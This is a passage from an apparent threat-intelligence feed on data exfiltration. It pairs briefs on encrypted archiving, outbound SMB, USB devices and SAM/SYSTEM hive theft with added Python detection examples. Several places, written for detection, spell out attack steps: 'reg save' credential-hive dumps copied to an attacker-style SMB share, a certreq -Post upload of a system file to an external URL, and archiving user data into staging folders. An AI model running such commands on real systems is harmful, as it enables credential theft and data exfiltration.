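The command-line patterns in this brief and in the Certreq brief above are both process-creation detections, so one matcher serves both. The block below is an added example written for this page, not the feed's Sigma rules or any vendor's code: a small Sigma-style rule table applied to Sysmon Event ID 1 style records. The `Image`, `CommandLine` and `User` field names follow Sysmon; the sample events are constructed. The archiver rules additionally require the `a` (add) command so that merely extracting a password-protected archive with `-p` does not fire, a false positive the bare flag match would produce.

```python
"""Command-line detections for certreq -Post and encrypted archive creation.

Added example (not the feed's Sigma rules).  Each rule pairs process-image
suffixes with a command-line regex and, for the archivers, a required token.
"""
import re

RULES = [
    {
        "name": "Certreq HTTP POST",
        "images": ("\\certreq.exe",),
        "pattern": re.compile(r"(?:^|\s)-post(?:\s|$)", re.IGNORECASE),
        "require_token": None,
    },
    {
        "name": "WinRAR encrypted archive",
        "images": ("\\rar.exe", "\\winrar.exe"),
        # -hp / /hp encrypt headers (file names) too; -p / /p encrypt file data only
        "pattern": re.compile(r"\s[-/](?:hp|p)\S*", re.IGNORECASE),
        "require_token": "a",          # "a" = add to archive; "x"/"e" extract
    },
    {
        "name": "7-Zip encrypted archive",
        "images": ("\\7z.exe", "\\7za.exe"),
        "pattern": re.compile(r"\s-p\S*", re.IGNORECASE),
        "require_token": "a",
    },
]


def match_rules(event):
    """Return the names of every rule matching one process-creation event."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    tokens = cmd.split()               # whitespace split is enough for flag tokens
    hits = []
    for rule in RULES:
        if not image.endswith(rule["images"]):
            continue
        if not rule["pattern"].search(cmd):
            continue
        if rule["require_token"] and rule["require_token"] not in tokens[1:]:
            continue
        hits.append(rule["name"])
    return hits


def detect(events):
    """Run all rules over a batch of events; one alert per (event, rule) pair."""
    alerts = []
    for ev in events:
        for name in match_rules(ev):
            alerts.append({"rule": name, "user": ev.get("User"),
                           "image": ev["Image"], "command_line": ev["CommandLine"]})
    return alerts


# Constructed Sysmon Event ID 1 records: three abuses and three benign look-alikes.
SAMPLE_EVENTS = [
    {"User": "CORP\\jdoe", "Image": r"C:\Windows\System32\certreq.exe",
     "CommandLine": r"certreq -Post -config https://files.example.net/up c:\windows\win.ini out.txt"},
    {"User": "CORP\\pkiadmin", "Image": r"C:\Windows\System32\certreq.exe",
     "CommandLine": r'certreq -submit -config "ca01.corp.example\Corp Issuing CA" req.req cert.cer'},
    {"User": "CORP\\jdoe", "Image": r"C:\Program Files\WinRAR\rar.exe",
     "CommandLine": r"rar.exe a -hpP@ssw0rd -r c:\staging\docs.rar c:\users\jdoe\documents"},
    {"User": "CORP\\jdoe", "Image": r"C:\Program Files\7-Zip\7z.exe",
     "CommandLine": r"7z.exe a -pS3cret -mhe=on c:\staging\fin.7z c:\users\jdoe\finance"},
    {"User": "CORP\\bob", "Image": r"C:\Program Files\7-Zip\7z.exe",
     "CommandLine": r"7z.exe x -pS3cret c:\downloads\backup.7z"},       # extraction, not staging
    {"User": "CORP\\bob", "Image": r"C:\Program Files\WinRAR\WinRAR.exe",
     "CommandLine": r"WinRAR.exe a -ep1 c:\temp\notes.rar readme.txt"},  # no password flag
]


def run_sample():
    return detect(SAMPLE_EVENTS)


if __name__ == "__main__":
    for a in run_sample():
        print(a["rule"], "->", a["command_line"])
```

The legitimate `certreq -submit` request to an enterprise CA and the two benign archiver invocations produce nothing; the three staged abuses each yield one alert carrying the user and full command line for triage.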
The number of victims and specific sectors targeted will vary depending on the attacker\u0026rsquo;s objectives and the nature of the compromised data.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Encrypting Files with WinRar or 7z - CommandLine\u0026rdquo; to your SIEM to detect the execution of WinRAR or 7-Zip with encryption parameters; because attackers routinely rename the binaries, match on the Sysmon OriginalFileName or Description fields as well as the image name (rule:Detect Encrypting Files with WinRar or 7z - CommandLine).\u003c/li\u003e\n\u003cli\u003eEnable process creation logging with command-line arguments (Sysmon Event ID 1, or Windows Security Event ID 4688 with command-line auditing enabled) so the encryption switches are available for detection (Data Source: Sysmon).\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rules to determine the scope and impact of the potential data exfiltration attempt: identify the archive path, the source directories passed on the command line, and any subsequent transfer of the archive off the host (rule:Detect Encrypting Files with WinRar or 7z - CommandLine).\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for unusual outbound connections, particularly to cloud storage services or other external destinations, that may indicate data exfiltration.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-winrar-7zip-encryption/","summary":"Adversaries use WinRAR or 7-Zip with encryption options to compress and protect stolen data before exfiltration, making detection more challenging.","title":"Detection of Encrypted Archive Creation with WinRAR or 7-Zip","url":"https://feed.craftedsignal.io/briefs/2024-01-winrar-7zip-encryption/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["initial-access","exfiltration","network"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThe provided Elastic rule identifies Server Message Block (SMB), also known as Windows File Sharing, traffic leaving internal hosts for external IP addresses. 
SMB is intended for internal network communication for file, printer, and resource sharing. Letting SMB cross the Internet boundary presents a significant security risk. Threat actors frequently target and exploit SMB for initial access, deploying backdoors, or exfiltrating sensitive data. This activity warrants immediate investigation as it violates best practices and poses a direct threat to network security. The rule focuses on TCP ports 139 and 445, originating from internal IP ranges and destined for external IPs, excluding destinations that fall in the private, loopback, link-local, and other special-purpose ranges reserved by IANA. The rule was last updated April 24, 2026.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn internal host is compromised, often through phishing or other social engineering techniques.\u003c/li\u003e\n\u003cli\u003eThe compromised host attempts to establish an SMB connection to an external IP address on TCP port 139 or 445, typically an attacker-controlled file server.\u003c/li\u003e\n\u003cli\u003eThe host negotiates an SMB session and attempts to authenticate. Because a Windows client sends NTLM authentication material to whichever server it connects to, even a session that never completes can hand the attacker the user\u0026rsquo;s NTLM hash for offline cracking or relay.\u003c/li\u003e\n\u003cli\u003eIf the session is established, the external server exposes shares that the compromised host can read from and write to.\u003c/li\u003e\n\u003cli\u003eThe attacker uses that channel to pull additional payloads, such as malware or backdoors, onto the internal host.\u003c/li\u003e\n\u003cli\u003eThe attacker copies sensitive data from the internal network to the external share, exfiltrating it over SMB.\u003c/li\u003e\n\u003cli\u003eThe attacker maintains persistence on the compromised internal host, reusing the SMB channel for command and control or as a staging point for lateral movement.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSMB sessions with Internet hosts can lead to significant data breaches, system compromise, and potential ransomware deployment. 
Exposed SMB services, or SMB sessions with untrusted external hosts, allow attackers to gain unauthorized access to sensitive files, critical infrastructure, and internal network resources. Successful exploitation can result in complete system takeover, data exfiltration, and disruption of business operations. While the exact number of victims is unknown, the prevalence of SMB vulnerabilities and misconfigurations suggests a widespread risk across various sectors.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the provided Sigma rule to your SIEM to detect SMB traffic to the internet and tune for your environment.\u003c/li\u003e\n\u003cli\u003eReview firewall and network configurations to ensure SMB traffic is not allowed to the Internet, as the rule description recommends, and block outbound TCP 139 and 445 both at the perimeter and in host-based firewalls so that roaming laptops stay covered.\u003c/li\u003e\n\u003cli\u003eInvestigate the source IP addresses triggering the rule, identifying internal systems initiating SMB traffic and determining if they belong to known devices or users within the organization, as described in the provided investigation guide; treat a completed authentication to an unknown external SMB server as a probable credential exposure for the logged-on user.\u003c/li\u003e\n\u003cli\u003eRegularly audit network configurations and update the rule exceptions to include any legitimate device IPs to prevent false positives, as mentioned in the investigation guide.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T14:12:00Z","date_published":"2024-01-02T14:12:00Z","id":"/briefs/2024-01-smb-to-internet/","summary":"This rule detects network events indicating the use of Windows file sharing (SMB or CIFS) traffic to the Internet, which is commonly exploited for initial access, backdoor deployment, or data exfiltration.","title":"SMB (Windows File Sharing) Activity to the Internet","url":"https://feed.craftedsignal.io/briefs/2024-01-smb-to-internet/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Microsoft Defender XDR","SentinelOne Cloud 
Funnel"],"_cs_severities":["low"],"_cs_tags":["initial-access","exfiltration","windows","registry","usb"],"_cs_type":"advisory","_cs_vendors":["Microsoft","SentinelOne","Elastic"],"content_html":"\u003cp\u003eThis detection identifies the first-time appearance of removable devices on a Windows system by monitoring registry modifications. While not inherently malicious, the activity can indicate potential data exfiltration over removable media or initial access attempts using malware delivered via USB. The rule specifically looks for registry events that set the \u0026ldquo;FriendlyName\u0026rdquo; value of a USB storage device instance under the \u0026ldquo;USBSTOR\u0026rdquo; enumeration key. Note that the friendly name is only what the device reports about itself; the vendor, product, and serial number embedded in the key path are the reliable identifiers for allowlisting. This helps in identifying potentially unauthorized devices connected to the system. The detection is designed to work with data from Elastic Defend, Microsoft Defender XDR, SentinelOne Cloud Funnel, and Sysmon.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA user connects a removable device (e.g., USB drive) to a Windows system.\u003c/li\u003e\n\u003cli\u003eThe operating system detects the new device and enumerates its properties.\u003c/li\u003e\n\u003cli\u003ePlug and Play records the device under the \u003ccode\u003eHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Enum\\USBSTOR\u003c/code\u003e key, in a subkey built from the vendor and product strings and an instance ID that normally carries the device serial number, and writes device-specific values such as \u0026ldquo;FriendlyName\u0026rdquo; there.\u003c/li\u003e\n\u003cli\u003eThe detection treats the first observation of that device path on the host as a new device; later insertions of the same device do not alert again.\u003c/li\u003e\n\u003cli\u003eThe registry write produces a registry modification event (Sysmon Event ID 13), which is logged by Sysmon, Elastic Defend, Microsoft Defender XDR, or SentinelOne.\u003c/li\u003e\n\u003cli\u003eAn attacker may use the USB device to deploy malware or exfiltrate sensitive data.\u003c/li\u003e\n\u003cli\u003eThe attacker copies files to the USB device.\u003c/li\u003e\n\u003cli\u003eThe 
attacker removes the USB device, completing the exfiltration.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eData exfiltration or malware delivery via USB can lead to the loss of sensitive information, intellectual property theft, or the introduction of malware into the network. Although this alert is low severity, multiple alerts across the environment may indicate an active campaign. The detection keys on registry modifications, which occur as soon as the device is enumerated and before any files are copied, allowing for proactive monitoring and response.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon registry event logging (Event ID 13, with the USBSTOR key path included in the configuration) to detect registry modifications related to USB devices and activate the Sigma rules below.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided to your SIEM to detect and monitor first-time seen USB devices.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rules, correlating with user activity and file access events.\u003c/li\u003e\n\u003cli\u003eMaintain a list of approved USB devices, keyed by the device instance path (vendor, product, and serial number) rather than the FriendlyName alone, and create exceptions for them in the monitoring system to reduce false positives as described in the rule documentation.\u003c/li\u003e\n\u003cli\u003eMonitor for subsequent file access or transfer events involving the new device as described in the rule documentation.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T14:00:00Z","date_published":"2024-01-02T14:00:00Z","id":"/briefs/2024-01-first-time-usb/","summary":"Detection of newly seen removable devices via Windows registry modification events can indicate data exfiltration attempts or initial access via malicious USB drives.","title":"First Time Seen Removable Device Registry Modification","url":"https://feed.craftedsignal.io/briefs/2024-01-first-time-usb/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic 
Defend"],"_cs_severities":["medium"],"_cs_tags":["credential-access","lateral-movement","exfiltration","windows"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis threat brief addresses the potential exfiltration of Windows registry hives via SMB shares, a tactic often employed after credential dumping. Attackers target sensitive hives like the Security Account Manager (SAM), together with the SYSTEM hive that holds the boot key needed to decrypt it, to extract local account password hashes. By copying these hives to another system, they avoid running a parsing or cracking tool on the compromised host and can extract the credentials offline. The Elastic detection rule \u003ccode\u003ea4c7473a-5cb4-4bc1-9d06-e4a75adbc494\u003c/code\u003e identifies the creation or modification of registry hive files (identified by the \u0026ldquo;regf\u0026rdquo; header) exceeding 30KB on SMB shares. The rule keys on the writer being the System process (PID 4), which is how the SMB server on the host that hosts the share performs file writes on behalf of remote clients, combined with a user SID belonging to a regular account (prefix S-1-5-21 for local and domain accounts, S-1-12-1 for Azure AD / Entra ID accounts) rather than a built-in service identity. This behavior raises suspicion, particularly when observed outside expected file paths. 
Defenders should monitor for this activity as it often precedes lateral movement and further compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains initial access to a Windows system.\u003c/li\u003e\n\u003cli\u003eThe attacker elevates privileges to SYSTEM or a local administrator account, which is required to read the SAM and SYSTEM hives.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the built-in \u003ccode\u003ereg.exe\u003c/code\u003e (e.g., \u003ccode\u003ereg save HKLM\\SAM sam.hive\u003c/code\u003e) or a dedicated credential dumping tool to extract the SAM registry hive.\u003c/li\u003e\n\u003cli\u003eThe attacker executes \u003ccode\u003ereg save HKLM\\SYSTEM system.hive\u003c/code\u003e to extract the SYSTEM registry hive, enabling decryption of SAM secrets.\u003c/li\u003e\n\u003cli\u003eThe attacker copies the dumped hives from the compromised host to an SMB share the attacker controls or can write to (e.g., \u003ccode\u003e\\\\attacker.example.com\\share\u003c/code\u003e), either with a file copy or by writing the dump output directly to the UNC path.\u003c/li\u003e\n\u003cli\u003eOn the Windows host serving that share, the SMB server creates or modifies the file in the context of the System process (PID 4) under the SID of the authenticating user; the file is identified as a registry hive by its header (\u0026ldquo;regf\u0026rdquo;).\u003c/li\u003e\n\u003cli\u003eThe written hive file is larger than 30KB, meeting the rule\u0026rsquo;s minimum size threshold.\u003c/li\u003e\n\u003cli\u003eThe attacker utilizes the exfiltrated SAM and SYSTEM hives to extract user credentials offline, facilitating lateral movement or further malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exfiltration of registry hives can lead to widespread credential compromise, enabling attackers to move laterally within the network, access sensitive data, and potentially achieve domain dominance. The impact includes unauthorized access to critical systems, data breaches, and significant disruption of business operations. 
The number of affected systems directly correlates with the scope of credential access achieved by the attacker.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Elastic detection rule \u003ccode\u003ea4c7473a-5cb4-4bc1-9d06-e4a75adbc494\u003c/code\u003e or the Sigma rules provided in this brief to your SIEM and tune for your environment to detect registry hive exfiltration attempts; because the rule fires on the host serving the share, it must run on file servers and any other host that exposes shares, not only on endpoints.\u003c/li\u003e\n\u003cli\u003eEnable file creation and modification logging on SMB shares, specifically focusing on events associated with the SYSTEM process and registry hive file signatures, to increase visibility.\u003c/li\u003e\n\u003cli\u003eReview and harden SMB share permissions so that only accounts with a business need can write to them, which removes internal shares as a convenient staging point for dumped hives.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by these rules promptly, focusing on identifying the source host, the user account involved, and the destination SMB share; a SAM hive accompanied by a SYSTEM hive from the same account is a strong indicator of a credential dump rather than a stray backup.\u003c/li\u003e\n\u003cli\u003eImplement multi-factor authentication (MFA) for all user accounts to mitigate the impact of credential theft, and rotate the local administrator passwords of affected hosts (for example via Windows LAPS), since NTLM hashes recovered from SAM remain usable for pass-the-hash against services that do not enforce MFA.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-smb-registry-exfiltration/","summary":"Detection of medium-sized registry hive files being created or modified on Server Message Block (SMB) shares, potentially indicating exfiltration of Security Account Manager (SAM) data for credential extraction.","title":"SMB Registry Hive Exfiltration","url":"https://feed.craftedsignal.io/briefs/2024-01-smb-registry-exfiltration/"}],"language":"en","title":"CraftedSignal Threat Feed — Exfiltration","version":"https://jsonfeed.org/version/1.1"}
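The following is an added worked example for the "Detection of Encrypted Archive Creation with WinRAR or 7-Zip" brief in the feed above; it is not code from the brief or from the Sigma rule it cites. It applies the command-line conditions the brief lists (`-hp`, `-p`, `/hp`, `/p` for rar.exe and WinRAR.exe, `-p` for 7z.exe and 7za.exe) to Sysmon-style process-creation events and adds two practitioner details: it also matches on Sysmon's `OriginalFileName` so a renamed rar.exe is still caught, and it reports whether the archive headers (file names) are encrypted too. The event dictionaries are constructed samples, not real telemetry.

```python
"""Encrypted-archive detector over Sysmon process-creation events (added example)."""
from dataclasses import dataclass
from typing import List, Optional

RAR_NAMES = {"rar.exe", "winrar.exe"}
SEVENZIP_NAMES = {"7z.exe", "7za.exe"}

# WinRAR: -p[pwd] encrypts file data, -hp[pwd] also encrypts headers (file names).
# WinRAR accepts '-' and '/' as the switch character; "hp" must be tested before "p".
RAR_SWITCHES = ("hp", "p")
# 7-Zip: -p{pwd} encrypts file data; -mhe=on additionally encrypts headers.
SEVENZIP_SWITCHES = ("p",)


@dataclass(frozen=True)
class Finding:
    image: str
    family: str             # "rar" or "7z"
    switch: str             # encryption switch that matched
    headers_encrypted: bool


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(event: dict) -> Optional[Finding]:
    """Return a Finding if this process-creation event builds a password-protected archive."""
    names = {_basename(event.get("Image", "")), event.get("OriginalFileName", "").lower()}
    if names & RAR_NAMES:
        family, switches = "rar", RAR_SWITCHES
    elif names & SEVENZIP_NAMES:
        family, switches = "7z", SEVENZIP_SWITCHES
    else:
        return None

    hit, headers = None, False
    # Switches are stand-alone tokens, so whitespace splitting is sufficient;
    # the first token is the program itself and is skipped.
    for tok in event.get("CommandLine", "").split()[1:]:
        if len(tok) < 2 or tok[0] not in "-/":
            continue
        body = tok[1:]
        for sw in switches:
            if body.startswith(sw):
                hit = hit or sw
                headers = headers or sw == "hp"
                break
        if family == "7z" and body.lower().startswith("mhe=on"):
            headers = True
    if hit is None:
        return None
    return Finding(event.get("Image", ""), family, hit, headers)


def detect(events) -> List[Finding]:
    return [f for f in map(analyze, events) if f is not None]


# Constructed Sysmon Event ID 1 samples (only the fields the detector reads).
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\WinRAR\rar.exe", "OriginalFileName": "Rar.exe",
     "CommandLine": r'rar.exe a -hpS3cret! C:\Users\Public\stage.rar "C:\Users\alice\Documents"'},
    {"Image": r"C:\Program Files\WinRAR\WinRAR.exe", "OriginalFileName": "WinRAR.exe",
     "CommandLine": r'"C:\Program Files\WinRAR\WinRAR.exe" a -p C:\Temp\out.rar C:\Finance\Q4'},
    {"Image": r"C:\Tools\7z.exe", "OriginalFileName": "7z.exe",
     "CommandLine": r"7z.exe a -pP@ssw0rd -mhe=on C:\Temp\docs.7z C:\Users\bob\Documents"},
    # rar.exe renamed to svchost.exe: only OriginalFileName gives it away
    {"Image": r"C:\Windows\Temp\svchost.exe", "OriginalFileName": "Rar.exe",
     "CommandLine": r"svchost.exe a /hpX C:\Windows\Temp\d.rar C:\HR"},
    # benign: extraction without a password, and an archive with no encryption switch
    {"Image": r"C:\Tools\7z.exe", "OriginalFileName": "7z.exe",
     "CommandLine": r"7z.exe x C:\Downloads\update.7z -oC:\Downloads\update"},
    {"Image": r"C:\Program Files\WinRAR\rar.exe", "OriginalFileName": "Rar.exe",
     "CommandLine": r"rar.exe a -ep1 -r C:\Backups\projects.rar C:\Projects"},
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Running the block prints four findings; the two benign invocations produce none. Tuning for a real environment means adding exclusions for backup jobs that legitimately pass a password, which is best done by image path plus parent process rather than by loosening the switch match.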
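The following is an added worked example for the "SMB (Windows File Sharing) Activity to the Internet" brief in the feed above; it is not code from the brief or from the Elastic rule it summarises. The "excluding reserved ranges as defined by IANA" condition is implemented with Python's `ipaddress` module, whose `is_global` property is derived from the IANA special-purpose address registries, so private, loopback, link-local, CGNAT (100.64/10), documentation and reserved space never count as Internet destinations without a hand-maintained list. The `Flow` records and the allowlist CIDR are constructed samples.

```python
"""Flag outbound SMB (TCP 139/445) from internal hosts to Internet addresses (added example)."""
import ipaddress
from dataclasses import dataclass
from typing import Iterable, List, Sequence

SMB_PORTS = {139, 445}


@dataclass(frozen=True)
class Flow:
    src_ip: str
    dst_ip: str
    dst_port: int
    transport: str = "tcp"


def is_internet_address(ip: str) -> bool:
    """True only for globally routable unicast addresses (IPv4 or IPv6)."""
    addr = ipaddress.ip_address(ip)
    # is_global excludes everything IANA marks as not globally reachable;
    # multicast is excluded separately because 224/4 and ff00::/8 are not in that set.
    return addr.is_global and not addr.is_multicast


def is_internal_address(ip: str) -> bool:
    """Internal source ranges, as the rule defines them: RFC 1918 and other private space."""
    return ipaddress.ip_address(ip).is_private


def smb_to_internet(flows: Iterable[Flow], allowlist: Sequence[str] = ()) -> List[Flow]:
    """Return flows that match the rule: internal source, SMB port, Internet destination.

    allowlist holds CIDRs for destinations that are known-good in your
    environment (the rule's per-environment exceptions).
    """
    allowed = [ipaddress.ip_network(cidr, strict=False) for cidr in allowlist]
    hits = []
    for flow in flows:
        if flow.transport.lower() != "tcp" or flow.dst_port not in SMB_PORTS:
            continue
        if not is_internal_address(flow.src_ip) or not is_internet_address(flow.dst_ip):
            continue
        dst = ipaddress.ip_address(flow.dst_ip)
        if any(dst in net for net in allowed):   # mixed IPv4/IPv6 comparisons are simply False
            continue
        hits.append(flow)
    return hits


# Constructed flow records (public addresses are placeholders, not observed destinations).
SAMPLE_FLOWS = [
    Flow("10.20.30.40", "8.8.8.8", 445),              # internal -> Internet: alert
    Flow("10.20.30.40", "192.168.1.10", 445),         # internal file server: ignore
    Flow("10.20.30.41", "203.0.113.5", 139),          # IANA documentation range: ignore
    Flow("10.20.30.42", "100.64.0.7", 445),           # CGNAT shared address space: ignore
    Flow("10.20.30.43", "1.1.1.1", 445),              # on the allowlist: ignore
    Flow("10.20.30.44", "8.8.4.4", 443),              # not an SMB port: ignore
    Flow("172.16.5.9", "2001:4860:4860::8888", 445),  # IPv6 Internet destination: alert
    Flow("8.8.8.8", "10.0.0.1", 445),                 # inbound, not outbound: ignore
]

if __name__ == "__main__":
    for hit in smb_to_internet(SAMPLE_FLOWS, allowlist=["1.1.1.0/24"]):
        print(f"outbound SMB to Internet: {hit.src_ip} -> {hit.dst_ip}:{hit.dst_port}")
```

The same `is_internet_address` check is what a perimeter block rule should mirror: if it is not globally routable it is not a candidate for the Internet, and everything else on 139/445 should be dropped unless it is explicitly allowlisted.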
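The following is an added worked example for the "First Time Seen Removable Device Registry Modification" brief in the feed above; it is not code from the brief or from the Elastic and Sigma rules it describes. It keys "first seen" on the USBSTOR device instance path (vendor and product strings plus the serial-number instance ID) rather than on the `FriendlyName` value, because a friendly name is neither unique nor trustworthy, and it tracks state per host so the same stick on a second machine alerts again. The event layout mimics Sysmon Event ID 13 (RegistryEvent, value set); the events, registry paths and the approved-device list are constructed.

```python
"""First-seen removable device detector over Sysmon registry events (added example)."""
import re
from typing import Dict, Iterable, List, Optional, Set, Tuple

# Matches the FriendlyName value of a USBSTOR device instance:
# ...\Enum\USBSTOR\<Disk&Ven_x&Prod_y&Rev_z>\<serial&0>\FriendlyName
USBSTOR_FRIENDLYNAME = re.compile(
    r"\\Enum\\USBSTOR\\(?P<device>[^\\]+)\\(?P<instance>[^\\]+)\\FriendlyName$",
    re.IGNORECASE,
)


class FirstSeenUsbDetector:
    """Emits one alert per (host, device instance) the first time it is written."""

    def __init__(self, approved_devices: Iterable[str] = ()):
        self.approved: Set[str] = {d.lower() for d in approved_devices}
        self.seen: Set[Tuple[str, str]] = set()

    def process(self, event: dict) -> Optional[Dict[str, str]]:
        if event.get("EventID") != 13:          # only registry value-set events
            return None
        m = USBSTOR_FRIENDLYNAME.search(event.get("TargetObject", ""))
        if not m:
            return None
        device_path = f"{m['device']}\\{m['instance']}".lower()
        key = (event.get("Computer", "").lower(), device_path)
        if device_path in self.approved or key in self.seen:
            return None
        self.seen.add(key)
        return {
            "host": event.get("Computer", ""),
            "device": m["device"],
            "instance": m["instance"],
            "friendly_name": event.get("Details", ""),
        }


def run(events: Iterable[dict], approved_devices: Iterable[str] = ()) -> List[Dict[str, str]]:
    detector = FirstSeenUsbDetector(approved_devices)
    return [alert for alert in map(detector.process, events) if alert is not None]


# Constructed registry paths and events.
SANDISK = r"HKLM\System\CurrentControlSet\Enum\USBSTOR\Disk&Ven_SanDisk&Prod_Cruzer&Rev_1.00\4C530001230101&0"
KINGSTON = r"HKLM\System\CurrentControlSet\Enum\USBSTOR\Disk&Ven_Kingston&Prod_DataTraveler&Rev_PMAP\0019E06B5555&0"
APPROVED = [r"Disk&Ven_Kingston&Prod_DataTraveler&Rev_PMAP\0019E06B5555&0"]

SAMPLE_EVENTS = [
    {"EventID": 13, "Computer": "WS01", "TargetObject": SANDISK + r"\FriendlyName", "Details": "SanDisk Cruzer USB Device"},
    {"EventID": 13, "Computer": "WS01", "TargetObject": SANDISK + r"\FriendlyName", "Details": "SanDisk Cruzer USB Device"},   # reinserted: suppressed
    {"EventID": 13, "Computer": "WS02", "TargetObject": SANDISK + r"\FriendlyName", "Details": "SanDisk Cruzer USB Device"},   # same stick, new host
    {"EventID": 13, "Computer": "WS01", "TargetObject": KINGSTON + r"\FriendlyName", "Details": "Kingston DataTraveler USB Device"},  # approved
    {"EventID": 13, "Computer": "WS01", "TargetObject": SANDISK + r"\Capabilities", "Details": "DWORD (0x00000010)"},  # other value
    {"EventID": 1, "Computer": "WS01", "TargetObject": SANDISK + r"\FriendlyName", "Details": ""},  # not a registry event
]

if __name__ == "__main__":
    for alert in run(SAMPLE_EVENTS, APPROVED):
        print(alert)
```

In a SIEM this state lives in a lookup table or a "new terms" style rule rather than in process memory, but the key choice is the same: allowlist on the instance path, and expect a device with no serial number (Windows generates an instance ID for it) to look "new" more often than a real one.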
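The following is an added worked example for the "SMB Registry Hive Exfiltration" brief in the feed above; it is not code from the brief or from Elastic rule a4c7473a-5cb4-4bc1-9d06-e4a75adbc494. It encodes the conditions the brief describes (`regf` signature, size above 30KB, writer is the System process PID 4 acting for a user SID under S-1-5-21 or S-1-12-1, path outside expected locations) and adds a correlation step the brief's attack chain motivates: the attacker needs the SYSTEM hive to decrypt SAM, so two distinct hives from the same account on one server within a short window is a much stronger signal than a single file. The event field layout, the 30000-byte reading of "30KB", and the sample events are assumptions and constructed data.

```python
"""Registry hive written to an SMB share: rule conditions plus SAM/SYSTEM pairing (added example)."""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List, Sequence

REGF_MAGIC = b"regf"                             # first four bytes of any hive file
MIN_HIVE_SIZE = 30_000                           # brief: "exceeding 30KB" (assumed 30000 bytes)
SYSTEM_PID = 4                                   # server-side SMB writes run as the System process
USER_SID_PREFIXES = ("S-1-5-21-", "S-1-12-1-")   # local/domain users, Azure AD users


@dataclass(frozen=True)
class FileEvent:
    host: str        # host that serves the share and logged the event
    ts: float        # seconds since epoch
    action: str      # "creation", "modification" or "deletion"
    pid: int
    user_sid: str    # SID of the remote user the SMB server acted for
    path: str
    size: int
    header: bytes    # leading bytes of the file as recorded by the sensor


def is_hive_write_via_smb(ev: FileEvent, excluded_dirs: Sequence[str] = ()) -> bool:
    """True when a single event satisfies all of the rule's conditions."""
    if ev.action == "deletion" or ev.pid != SYSTEM_PID:
        return False
    if not ev.header.startswith(REGF_MAGIC) or ev.size < MIN_HIVE_SIZE:
        return False
    if not ev.user_sid.upper().startswith(USER_SID_PREFIXES):
        return False
    lowered = ev.path.lower()
    return not any(lowered.startswith(d.lower()) for d in excluded_dirs)


def correlate(events: Iterable[FileEvent], window: float = 600.0,
              excluded_dirs: Sequence[str] = ()) -> Dict[str, List[str]]:
    """Return {"host:sid": [hive paths]} for accounts that wrote two or more
    distinct hives to the same server within `window` seconds."""
    by_actor: Dict[tuple, List[FileEvent]] = defaultdict(list)
    for ev in sorted(events, key=lambda e: e.ts):
        if is_hive_write_via_smb(ev, excluded_dirs):
            by_actor[(ev.host, ev.user_sid)].append(ev)
    pairs: Dict[str, List[str]] = {}
    for (host, sid), evs in by_actor.items():
        for i, first in enumerate(evs):
            cluster = [e for e in evs[i:] if e.ts - first.ts <= window]
            if len({e.path.lower() for e in cluster}) >= 2:
                pairs[f"{host}:{sid}"] = sorted({e.path for e in cluster})
                break
    return pairs


# Constructed samples: a real dump writes SAM and then SYSTEM a minute apart.
HIVE_HEADER = REGF_MAGIC + b"\x07\x00\x00\x00\x07\x00\x00\x00"   # regf + sequence numbers
USER = "S-1-5-21-1111-2222-3333-1105"
AAD_USER = "S-1-12-1-4444-5555-6666-7777"
SAMPLE_EVENTS = [
    FileEvent("FS01", 1000.0, "creation", 4, USER, r"C:\Shares\public\sam.hive", 49_152, HIVE_HEADER),
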